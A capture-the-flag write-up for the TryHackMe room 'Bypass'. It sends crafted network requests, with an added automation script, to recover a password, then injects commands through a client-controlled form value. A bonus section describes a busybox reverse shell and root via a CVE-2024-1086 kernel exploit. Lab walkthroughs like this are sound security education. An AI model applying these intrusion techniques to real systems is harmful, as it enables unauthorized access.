# Bypass

{% embed url="<https://tryhackme.com/r/room/bypass>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We start with an Nmap scan and discover three open ports: SSH on port 22 and an `Apache/2.4.41` web server on ports 80 and 443, each of which serves a web page. A version and default-script scan (`-sV -sC`) adds little: port 80 answers with `403 Forbidden`, and port 443 reveals only its certificate details.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FQVeP91S9detbc2JNt7om%2Fgrafik.png?alt=media&#x26;token=403970f5-12fb-40ea-92ca-e8e496dc3076" alt=""><figcaption></figcaption></figure>

Calling the index page on port `80` only gives a `403 Forbidden`, as does every other resource we request there. The index page on port `443` presents a login prompt that expects a single password.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FkEMUg0YYbAvkhu4obcL9%2Fgrafik.png?alt=media&#x26;token=66b1540e-b5f8-47c6-9db7-831537e3e5fd" alt=""><figcaption></figcaption></figure>

If we look at the source, we discover an interesting comment that refers to the endpoint `/mail`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FKMTjJcBrKbL9P29xJzTi%2Fgrafik.png?alt=media&#x26;token=f0a58640-94d8-4772-bbdf-4428f15aa67e" alt=""><figcaption></figcaption></figure>

On this endpoint, we find a directory listing containing the file `dump.txt`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FqGAYedEKXylvPVMo4ZUb%2Fgrafik.png?alt=media&#x26;token=536f4f06-0581-4d3e-acea-471642686f6d" alt=""><figcaption></figcaption></figure>

Here we find instructions for recovering the password of the login page. Each of `/fpassword.php?id=1` through `id=5` reveals one part of it, but only after a specific, specially crafted request has been sent to the machine first; then the page can be fetched. We will discuss each individual requirement below.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FDZVDjIVans1kP7fSKElW%2Fgrafik.png?alt=media&#x26;token=4a620aa0-3b0f-4fa6-9aff-b0045a2df387" alt=""><figcaption></figcaption></figure>

## First Login

As already stated, we have to recover the password piece by piece.

{% code overflow="wrap" %}

```
After receiving all the flags, you can visit the MACHINE IP that will ask you for the password. 
The first password will be concatenated values of all five flags you have received above.
```

{% endcode %}

### cctv.thm/fpassword.php?id=1

> ```
> Make a UDP request to the machine with source port number 5000. 
> Once done, you can fetch the flag through /fpassword.php?id=1
> ```

To make a UDP request, we use the command line tool `nc` with the flag `-u` to select UDP. The requirement only concerns the source port, which we set to `5000` with `-p`; the destination port is arbitrary, so we simply use `5000` there as well (our Nmap scan was TCP-only, so whether UDP 5000 is open on the target is unknown, and it does not matter for this check). We also send some data so that a datagram actually leaves our machine, and `-w1` makes `nc` give up after one second instead of waiting for a reply.

```bash
echo -n "Crafted packet for password recovery" | nc -u -w1 -p 5000 cctv.thm 5000
```

After submitting the command, we are able to retrieve the first flag at `https://cctv.thm/fpassword.php?id=1`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FlRqooHXsFDZRg60ZDzbL%2Fgrafik.png?alt=media&#x26;token=8c271a27-75c9-4cf7-a59a-9ccec2f7318a" alt=""><figcaption></figcaption></figure>

### cctv.thm/fpassword.php?id=2

> ```
> Make a TCP request to fpassword.php?id=2 with user-agent set as "I am Steve Friend". 
> Once done, you can fetch the flag through /fpassword.php?id=2
> ```

Here we have to make a TCP request with a special user agent. Since HTTP runs over TCP, a plain HTTP request using cURL with a custom user agent specified via `-A` is sufficient. Port 80 answers `403` for everything, but that does not matter here: the request, including its `User-Agent` header, still travels to the server in cleartext.

```bash
curl -A "I am Steve Friend" "http://cctv.thm/fpassword.php?id=2"
```

After submitting the command, we are able to retrieve the second flag at `https://cctv.thm/fpassword.php?id=2`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F0J6BvpZtAIGvFe8i9hal%2Fgrafik.png?alt=media&#x26;token=15354afd-6200-44c2-9b58-71f8f848adfa" alt=""><figcaption></figcaption></figure>

### cctv.thm/fpassword.php?id=3

> ```
> Send a ping packet to the machine appearing as Mozilla browser 
> (Hint: packet content with user agent set as Mozilla). 
> Once done, you can fetch the flag through /fpassword.php?id=3
> ```

Next, for the third flag, we need to send data inside an ICMP echo request. For this we use the `ping` command with the `-p` option, which specifies the pattern used to fill the payload of the echo request packets. The pattern is given in hex, for example `-p ff`, and is repeated to pad out the packet.

{% embed url="<https://stackoverflow.com/questions/31857419/how-to-send-a-message-with-ping>" %}

`ping` accepts at most 16 pad bytes, and they must be given hex encoded. We use CyberChef to encode `Mozilla` into its hex representation `4d6f7a696c6c61` (seven bytes, well within the limit).

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FYyQi3f7kYg7sutkvqQ5M%2Fgrafik.png?alt=media&#x26;token=76e71d40-6ecd-4eee-b477-f93e8d072e3d" alt=""><figcaption></figcaption></figure>

```bash
# -c 3 sends three echo requests and exits instead of pinging forever
ping -c 3 -p 4d6f7a696c6c61 cctv.thm
```

After submitting the command, we are able to retrieve the third flag at `https://cctv.thm/fpassword.php?id=3`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FC8GYJQ5DDfXH6ZCtRkKa%2Fgrafik.png?alt=media&#x26;token=3c9a850e-9671-4f57-a95e-3f92af3a7051" alt=""><figcaption></figcaption></figure>

### cctv.thm/fpassword.php?id=4

> {% code overflow="wrap" %}
>
> ```
> Attempt to login to the FTP server with content containing the word "user" in it. 
> Once done, you can fetch the flag from /fpassword.php?id=4
> ```
>
> {% endcode %}

Now we need to make a login attempt against the FTP server with content containing the word "user". The FTP protocol does this for us: the client sends the username we type as the cleartext command `USER <name>`, so connecting with the `ftp` client and entering any username is sufficient.

```bash
ftp cctv.thm
```

After submitting the command, we are able to retrieve the fourth flag at `https://cctv.thm/fpassword.php?id=4`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FgXOdylpzmz16ePek9lBU%2Fgrafik.png?alt=media&#x26;token=b62144ab-cb1d-44e6-8bf1-a2eb333eb9cd" alt=""><figcaption></figcaption></figure>

### cctv.thm/fpassword.php?id=5

> {% code overflow="wrap" %}
>
> ```
> Send TCP request to flagger.cgi endpoint with a host header containing more than 50 characters. 
> Once done, you can fetch the flag from /fpassword.php?id=5
> ```
>
> {% endcode %}

Lastly, we need to make a TCP request to the endpoint `flagger.cgi` with a `Host` header containing more than 50 characters. As with the second flag, a cURL request is sufficient; this time we override the `Host` header with `-H`, which lets us send an arbitrary header value (cURL otherwise derives `Host` from the URL). Make sure the value is actually longer than 50 characters.

{% code overflow="wrap" %}

```bash
curl -H "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" http://cctv.thm/flagger.cgi
```

{% endcode %}

After submitting the command, we are able to retrieve the fifth flag at `https://cctv.thm/fpassword.php?id=5`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FAdLdQovN6YIsTQ0ZXCom%2Fgrafik.png?alt=media&#x26;token=1e38f70a-ad12-453a-9974-5ddb210cd866" alt=""><figcaption></figcaption></figure>
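Putting the five triggers together, here is an added script (not part of the original write-up) that fires each one and then fetches the corresponding part from `fpassword.php`. It assumes `cctv.thm` resolves to the target, that the certificate on port 443 is self-signed (hence `curl -k`), and that the FTP service accepts a connection on port 21 (the `curl ftp://` login simply fails otherwise). The helper functions `hex_pattern` and `host_value` are mine. The two header-based triggers (`id=2` and `id=5`) stay on plain HTTP port 80 as in the write-up: a check that inspects the traffic on the wire could not read a `User-Agent` or `Host` header inside TLS, and a `403` answer does not stop the request from arriving.

```shell
#!/bin/sh
# Added example, not from the original write-up: fire all five triggers from
# dump.txt and collect the five password parts. Assumes cctv.thm resolves to
# the target and that the HTTPS certificate is self-signed (curl -k).

TARGET="${TARGET:-cctv.thm}"

# Convert a string into the hex "pad" pattern that `ping -p` accepts.
# ping allows at most 16 pad bytes, so longer strings are rejected.
hex_pattern() {
    [ "${#1}" -le 16 ] || return 1
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n'
}

# Build a Host header value of exactly N characters (the letter A repeated).
host_value() {
    n="$1"; s=""
    while [ "$n" -gt 0 ]; do s="${s}A"; n=$((n - 1)); done
    printf '%s' "$s"
}

# Send the trigger for password part 1..5.
trigger() {
    case "$1" in
        1) # UDP datagram with source port 5000; the destination port is arbitrary.
           printf 'Crafted packet for password recovery' \
               | nc -u -w1 -p 5000 "$TARGET" 5000 ;;
        2) # Any HTTP request is a TCP request; only the User-Agent matters.
           curl -s -A 'I am Steve Friend' "http://$TARGET/fpassword.php?id=2" >/dev/null ;;
        3) # ICMP echo requests whose payload carries "Mozilla".
           ping -c 3 -p "$(hex_pattern Mozilla)" "$TARGET" >/dev/null ;;
        4) # FTP login attempt: the client sends "USER user" in cleartext.
           curl -s --max-time 5 --user user:user "ftp://$TARGET/" >/dev/null || true ;;
        5) # Host header longer than 50 characters.
           curl -s -H "Host: $(host_value 51)" "http://$TARGET/flagger.cgi" >/dev/null ;;
    esac
}

# Fetch part N of the password over HTTPS, where fpassword.php is served.
fetch_part() {
    curl -sk "https://$TARGET/fpassword.php?id=$1"
}

main() {
    i=1
    while [ "$i" -le 5 ]; do
        trigger "$i"
        printf 'part %s: ' "$i"; fetch_part "$i"; echo
        i=$((i + 1))
    done
}

# Only touch the network when explicitly asked: `sh bypass.sh run`
case "${1:-}" in run) main ;; esac
```

Run it as `sh bypass.sh run` (or `TARGET=10.10.x.x sh bypass.sh run` to skip the hosts-file entry); the printed parts are concatenated in order to form the first password.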

### Logging in

Now that we have all five parts of the password, we concatenate them to form the password. Each part goes in whole, exactly as returned by `fpassword.php`.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FcqRdPrj23OD5UdltgaGC%2Fgrafik.png?alt=media&#x26;token=3489bcbb-4c69-4838-a029-338147834c17" alt=""><figcaption></figcaption></figure>

After submitting the password, we log in and find another login form, this time requiring a username and a password. Next to it is a drop-down with a single entry that displays a timestamp.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FgZ9RZsUgiwmMiIJKQtoK%2Fgrafik.png?alt=media&#x26;token=97b76c9b-e58d-415a-9ab1-cae76491b94a" alt=""><figcaption></figcaption></figure>

## Second Login

For the second login we only need the username, since the password is the same as before. The username is the machine's hostname. The developer claims that command execution is impossible in this part of the application; we will see that this is not the case.

> {% code overflow="wrap" %}
>
> ```
> For the second layer of security, I have enabled a wholly sandboxed login environment with no connection to the database and no possibility of command execution. The username is the computer's hostname, and the password is the same as the previous password. I will SMS you the details as well.
> ```
>
> {% endcode %}

Looking at the page source, we see that the drop-down is part of a form, and the `value` of its only option looks like a shell command rather than a display value. That suggests the server executes whatever value it receives and trusts the client to send only the pre-defined one.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fc25U1cAhPmUWaLI6Gd8K%2Fgrafik.png?alt=media&#x26;token=5fee7d7e-699d-4266-9f20-477fadd316df" alt=""><figcaption></figcaption></figure>

The JavaScript code listens for the `DOMContentLoaded` event and attaches a change listener to the drop-down. When the selection changes, it submits the form named `myform`. Since the submitted option value is under our control, all we have to do is extend the drop-down with options whose values are the commands we want to execute.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FxfQqW2txcGB1mBjNwB3k%2Fgrafik.png?alt=media&#x26;token=9d0438b8-b896-4e39-9a0b-a396bcf3ed7c" alt=""><figcaption></figcaption></figure>

### What is the username for the CCTV web panel?

So, let's get the username, I mean hostname of the machine.

> ```
>  The username is the computer's hostname, [...]
> ```

This is how the added element could look:

```
<option value="hostname">Get Hostname</option>
```

We can add it with the developer tools of Firefox or Chrome: duplicate the existing `option` node and change its `value` attribute to `hostname`. With the drop-down prepared, we trigger the submission by selecting the new second entry.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fy4J8GrWIHYg65YU3xuet%2Fgrafik.png?alt=media&#x26;token=888b4883-5b0d-422b-907a-e9cec0fc1a02" alt=""><figcaption></figcaption></figure>

Here is the procedure:

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FtOGzwx8uDZUfyKAG6PdD%2Fhostname.gif?alt=media&#x26;token=7474f1ce-7d43-415f-8e67-977766ec4a08" alt=""><figcaption></figcaption></figure>

### What is the lsb\_release -r -s command output from the attached machine?

We repeat the process to get the LSB release number.

```
<option value="lsb_release -r -s">Get Release Number</option>
```

### What is the flag value after logging into the CCTV web panel?

After logging in ...

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FVwJWREgfzVSoUehkTRAf%2Fgrafik.png?alt=media&#x26;token=e140017d-48b8-40c6-bad0-45a1d6e6442f" alt=""><figcaption></figcaption></figure>

... we have access to the CCTV feeds and the final flag.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FGv2IELi79diFhg5GLmGr%2Fgrafik.png?alt=media&#x26;token=e41d9835-1350-4bc9-b5e4-bb37506c2e58" alt=""><figcaption></figcaption></figure>

## Bonus: Initial Foothold + Privilege Escalation

Being curious, we try to get on the machine using a reverse shell.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FAaoxmdo6hBlsKBaflAtq%2Fgrafik.png?alt=media&#x26;token=f8ec6daf-7221-459b-933d-47614857d4f3" alt=""><figcaption></figcaption></figure>

After setting up a listener and triggering the selection, we are able to catch a reverse shell using busybox.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fxco3HgB7nop5I38MmCpe%2Fgrafik.png?alt=media&#x26;token=6125fb41-f2c0-4fe0-a432-6d6e4ae06a2c" alt=""><figcaption></figcaption></figure>

We are dealing with the kernel `5.15.0-1041`. Maybe we could get root privileges with a kernel exploit.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2Fdlz7EsBOlhzEbUe9WqlM%2Fgrafik.png?alt=media&#x26;token=88fa0fd9-c42c-4514-a9d2-0d1773756782" alt=""><figcaption></figcaption></figure>

The PoC for `CVE-2024-1086`, a use-after-free in the kernel's `nf_tables` subsystem, looks promising. We compile the following and transfer it to the machine. Keep in mind that kernel exploits are a last resort on real engagements, since a failed attempt can crash the host; on a throwaway CTF box that risk is acceptable.

{% embed url="<https://github.com/Notselwyn/CVE-2024-1086?tab=readme-ov-file>" %}

After executing the exploit we get root privileges.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FRhyU05UeTpXJ7yfR1Zeg%2Fgrafik.png?alt=media&#x26;token=b361af71-9afa-426b-8a6f-761a7fbc8c33" alt=""><figcaption></figcaption></figure>
